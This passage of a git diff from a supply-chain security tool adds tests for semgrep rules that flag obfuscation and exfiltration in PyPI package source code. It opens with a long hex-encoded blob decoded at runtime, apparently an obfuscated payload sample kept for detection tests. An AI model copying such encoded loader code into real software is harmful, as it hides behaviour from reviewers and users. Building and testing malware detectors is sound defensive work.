87983275d599b62b3c53a8564dd8cead39708a9d20547a8e9e36da481d93376334c6aab5bdbbafd355d9de4cfa78232a40bed92c33dcc233b46389c8f2e7460ef40a25166e694c78063ec65fefb7a4f2aec0aca5dece9a9aeec4adff1898ea8d54bac33b4de49af7a18d6c1639d09191286e5b274d5accb3551080579b9e025fd711576206c97af57dcd23bee8917d63126d7e13a1de10855751093ba3dc57d11745f89cbbba1575ff152ae9b203e4c135e4b8ce74a148fe4a5479ae336774d408f1fa7750cb8f6080c54f89f4998d0415ae86d162fcdf0f7bdd1bba69e57a53dbd0aec906fbcd2b520ad9fcda142f5edf6253c744812ddce881928553575ea8226ecaa5d73a5dbe7bb6bba62c7a4e645549886e849b427a708338f1d3bced6a966355483e0763bc5db4e9fb649204bacab2aed098a4b3566de1dedf4cc7f73d7ab0af4d5ebb96afab396511d324eea897cbc19a28098a72a486c26687426518f462d0113da3d6e4e0c3d115688ea187fb2f7386a170fb6b977b773c5eec1f74220fcdc3530a84d47bcfe114bb22633c6cdcb68ff6496f6a346da4d94aa8cd9faf67ab0f2dde4be919717bceee2d0ebe20e4fd4afeac38af44437d2f8575971afd1340df0668493c0321dfa712e85da9fed151740f3dfafdddfcda74021672001c2715ea0b70074408cbe4020ae460782a337392194afa0c54150b5c0f361d695540124d61033a3b0a0f6df07b3796a281663ba0b221d4aeb3d2acd721251e62078ee40851b0dc600171c61b1414ac9d181514ecdb7009935c9a9a4b332cc00c2a8d0818924818f1b1a45782d7a8773c881fe86e862305799300937c391396cd0080b4b1a96c72105c239006a85b354ca2a91e630230bb91aaa9f94873437c60b665e3a91810b7bf258ead56c8ba486344e8213004d66a37627b94b6da2b83b78953300c8e552538ab48b2016c9fc2ee1159509cf78ea3d51babd312a77025e610b63d0cda45205b8590411570b506a8ddcf8a9bc8b8258a589799339ea27f03ab555b59afbb47e0c5b5cd3c675624853b6af401c046242ca326137dec524ce230e2c5554201cd8eb901211a218da0542a0ae301304180a7415684de3538f5d1be1b3157641b55798a491ac07d45ceaadc72e93f5540dcc1c75649ccd17d59ff4dfc7253fdd64c2ec4680449e411049f72f18a2c878f82252589c840630857ce362e1e5472d042f91548710b5a1f023d509ca3cc5381f69239cb2b30ccd3bb8290004c272545e6b24109d630ede16780713217297f031e9d57e58831aebb876651792de73b56681095d4a5f62b640fb83c171e30eb7f4bbacc45efd2e44455cbbceb56ca5d04daef8bcb5b29550fe721f3f84ba296c18843203c019bdf4dad6fcea51a16659ed68c4a0b9e280d73f6a83add64fb5087ae150734a7160af1b8847535c8ed84a4d40077a168d786e85a13528090b1850481682becc00d29771da28c1e6cb8d898d7d02875b3a1156629f4e04a3ae3b48ef9e59b52644fcde101088a409b42376e4f99454444de8557ff1992b415501a7db525a6811e37245d2a27060dfaf1387bc8afd0b654864735c75586af6def5681cd24053188291c672cff4bfd31be5275ae3fdc3d2cbad6e14e054f723922c9b0974e53704b8b1cd080b8ee55657eb9bce3234efe0a6001078ef5db0932cb7ba43c6956967686fb175a8e24619981440a9b5e553668ee004bc6e39506125f6f3e3a0bbdd1997af1dcee9d49a4b093be471296135de8e05c852c2e2e0b0682a4897e5141016648848323a30ca19c60369a758d9c3f3330e944d6c5eb4b46cc700a8b814499bdaa597df95a6288bad41690a820d37cb2256b53561beaccea1ced827f0b5a5056325f6fd35a9b67ae3b4aeae5d18edc0c30002a1f524f9be194d51de79fdd88ffb91df7014bf33f1206d52e0bc091d66dca8703f9018ed0a6c6c62e3d01a557db33e87f1eac3e60574403e197c39839942cf49c98805c77206a3148a64de60c4c18ea627dc62132f6308aaea109c5fd3610d6aac73332d0213e194bec46c81f60783e3c61d6ee9725989f52e0cdadaf3a3edf333bf729708e21b0202e134ed3a57518088139635c427aa8914b5a8360125915cca4912496c50e530b3200aaa9c4f2132d6d13c595cc7081f10f9f273c51baf41ac410bae5040215948c6d7d58a5e93073fb589b903ddc019fb047eb7d4beacc4be9e0ce3d494c0a9cf93675452d306ba1120109d4b294dcfb0d1ba6486a1255301cc6c495b56b129905c4a4802835c02c518027911266cb1ab899853e8a09f2a65034c41038a4bf9ae8a11b9bd4817ba8d32ca1ab4e00a05149285a02f3380f4458f364ab0f9726362639fc0e196ba9d95d8bb030dfb7dcc8c8a6a1584c03827201049d3aeb199a914090dc01ae2d356829202ceb5b4fccafcb27c96a1148a64de6004dc4a347b278c40b80309b6b6cba8bf8628aaea109c5fc5610d6aac7363f50105e4d426e60e740330466edcef964a979538c493434a5de39955d50b7b7a8ffe1680401c4dbece35ed02da19331c44c2c53df98296d4945ff9280c6f563b4b11040d5a7085020ac94234d71180a508e251cfcfef962288957802455039b33ac85934a1fae55395458431fd0e6bc55512311f665d4995c987fc0c3b67b9796d18944b61c632ac77789c3f0a0231111a0fd07a30e804bb9f85d05a0572cae150ca497360afeb20a07a0614976f195a3712da456a2f654ccfb1d6b406256101030ac94234d40940faca501b25d87cb931b1b14fe0704b73c34a1cf02d030813b637c9bf142eddc68667d3e6550240357e4f7120303f1a53f7946c986788afa79befc329dd610c77e4318705c7d37edbd23c293f774fdd975fd65776697da55e5034aff70eb05ebc19edff0cd1139aa01aa0516615bc081c554ddda4fd178eaff5cbe63846011d763eec47f4a9012a582957d589cbd20c4d04e9758662a4c95ea0d325d70e12ffa9d3e5a7b33a8fcab2c448fbd56d1b62a8d311549a94c46ddb8a098a5b11de4eb8e93ca6f9f3ad22f194d5c0a29dd6b2d80b5a61e966d870688ef10ca7131311d4007e741a8e9f5802ad32a7a32c3b3869e1382686cb077349c418566a11cec979d5e65b76f1fa5576795b3d1f5f760fabdddffb5356bfe679f6ef7cb5ffb17a3b9e56cfdbc361fbfdb0cb7eee4edbd3e9bd6aeebfffde1f4efbb78fcabb5777cfc7d75ffbc3eeee7ef5e7f1ad5aba3abeafa0a9c56562b5a42c5f8f2fbf0fbbb2ac56dddde5ab7f3daeeeda997722046fdbd7e1f2968dd5eef0b1bbb092d50130088d6fad22eabf19efe0434ea834f994b5f02f5fdab7afdd927cf3d58b408db81df644919c4780d74d6ece0cd7ed43c777fb12c0abc9a7164b5695c9feab5d3e1883346aecb33a90e16393fc647e9aff1f99b5fed2'.replace("\n" , ""))).decode()) diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py new file mode 100644 index 000000000..3fb423e46 --- /dev/null +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -0,0 +1,116 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Tests for experimental feature detecting malicious patterns in PyPI package sourcecode.""" +import json +import os +from unittest.mock import MagicMock, patch + +import pytest + +from macaron import MACARON_PATH +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult +from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer + +RESOURCES_PATH = os.path.join(MACARON_PATH, "resources") + + +def test_no_resources() -> None: + """Test for when the semgrep rules can't be found, so error.""" + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path="") + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_no_defaults_section(mock_defaults: MagicMock) -> None: + """Test for when the heuristics.pypi in defaults isn't defined at all, so error.""" + mock_defaults.has_section.side_effect = lambda _: False + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_no_custom_path(mock_defaults: MagicMock) -> None: + """Test for when a default path isn't provided, so the custom rule path should be None.""" + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda _: (MagicMock(get=MagicMock(return_value=None))) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + assert analyzer.custom_rule_path is None + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value="" if section == "heuristic.pypi" else None)) + ) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + assert analyzer.custom_rule_path is None + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_nonexistent_rule_path(mock_defaults: MagicMock) -> None: + """Test for when the custom path provided does not exist, so error.""" + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value="some_random_path" if section == "heuristic.pypi" else None)) + ) + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_invalid_custom_rules(mock_defaults: MagicMock) -> None: + """Test for when the provided file is not a valid semgrep rule, so error,""" + # use this file as an invalid semgrep rule as it is most definitely not a semgrep rule, and does exist + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value=os.path.abspath(__file__) if section == "heuristic.pypi" else None)) + ) + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + +def test_no_sourcecode(pypi_package_json: MagicMock) -> None: + """Test for when there is no source code available, so error.""" + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + pypi_package_json.package_sourcecode_path = "" + + with pytest.raises(HeuristicAnalyzerValueError): + analyzer.analyze(pypi_package_json) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +@pytest.mark.parametrize( + # the sourcecode sample directory under resources/sourcecode_samples and the semgrep rule under resources/pypi_malware_rules + ("sourcecode_sample_dir", "rule_file"), + [ + pytest.param("obfuscation", "obfuscation.yaml", id="obfuscation"), + pytest.param("exfiltration", "exfiltration.yaml", id="exfiltration"), + ], +) +def test_rules( + mock_defaults: MagicMock, pypi_package_json: MagicMock, sourcecode_sample_dir: str, rule_file: str +) -> None: + """Test the semgrep rules for obfuscation on code samples.""" + sample_path = os.path.join( + os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples", sourcecode_sample_dir + ) + + with open(os.path.join(sample_path, "expected_results.json"), encoding="utf-8") as file: + expected_results = json.loads(file.read()) + + # test defaults without custom rule path + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=MagicMock(return_value="" if section == "heuristic.pypi" else None)) + ) + + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + pypi_package_json.package_sourcecode_path = sample_path + analyzer.default_rule_path = os.path.join(analyzer.default_rule_path, rule_file) + + result, analysis = analyzer.analyze(pypi_package_json) + + assert result == HeuristicResult.FAIL + assert expected_results == analysis diff --git a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py index 15caf3249..3910b9579 100644 --- a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py +++ b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py @@ -7,10 +7,12 @@ import os import urllib.parse from pathlib import Path +from unittest.mock import MagicMock, patch import pytest from pytest_httpserver import HTTPServer +from macaron import MACARON_PATH from macaron.config.defaults import load_defaults from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics from macaron.slsa_analyzer.checks.check_result import CheckResultType @@ -22,20 +24,30 @@ RESOURCE_PATH = Path(__file__).parent.joinpath("resources") +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.global_config") @pytest.mark.parametrize( - ("purl", "expected"), + ("purl", "expected", "experimental"), [ # TODO: This check is expected to FAIL for pkg:pypi/zlibxjson. However, after introducing the wheel presence # heuristic, a false negative has been introduced. Note that if the unit test were allowed to access the OSV # knowledge base, it would report the package as malware. However, we intentionally block unit tests # from reaching the network. - ("pkg:pypi/zlibxjson", CheckResultType.PASSED), - ("pkg:pypi/test", CheckResultType.UNKNOWN), - ("pkg:maven:test/test", CheckResultType.UNKNOWN), + pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, False, id="test_malicious_pypi_package"), + pytest.param("pkg:pypi/test", CheckResultType.UNKNOWN, False, id="test_unknown_pypi_package"), + pytest.param("pkg:maven:test/test", CheckResultType.UNKNOWN, False, id="test_non_pypi_package"), + # TODO: including source code analysis that detects flow from a remote point to a file write may assist in resolving + # the issue of this false negative. + pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, True, id="test_experimental_malicious_pypi_package"), ], ) def test_detect_malicious_metadata( - httpserver: HTTPServer, tmp_path: Path, macaron_path: Path, purl: str, expected: str + mock_global_config: MagicMock, + httpserver: HTTPServer, + tmp_path: Path, + macaron_path: Path, + purl: str, + expected: str, + experimental: bool, ) -> None: """Test that the check handles repositories correctly.""" check = DetectMaliciousMetadataCheck() @@ -44,6 +56,10 @@ def test_detect_malicious_metadata( ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir="", purl=purl) pypi_registry = PyPIRegistry() ctx.dynamic_data["package_registries"] = [PackageRegistryInfo("pip", "pypi", pypi_registry)] + if experimental: + ctx.dynamic_data["analyze_source"] = True + + mock_global_config.resources_path = os.path.join(MACARON_PATH, "resources") # Set up responses of PyPI endpoints using the httpserver plugin. with open(os.path.join(RESOURCE_PATH, "pypi_files", "zlibxjson.html"), encoding="utf8") as page: @@ -129,5 +145,5 @@ def test_evaluations(combination: dict[Heuristics, HeuristicResult]) -> None: confidence, triggered_rules = check.evaluate_heuristic_results(combination) assert confidence == 0 - # Expecting this to be a dictionary, so we can ignore the type problems + # Expecting this to be a dictionary, so we can ignore the type problems. assert len(dict(triggered_rules)) == 0 # type: ignore[arg-type]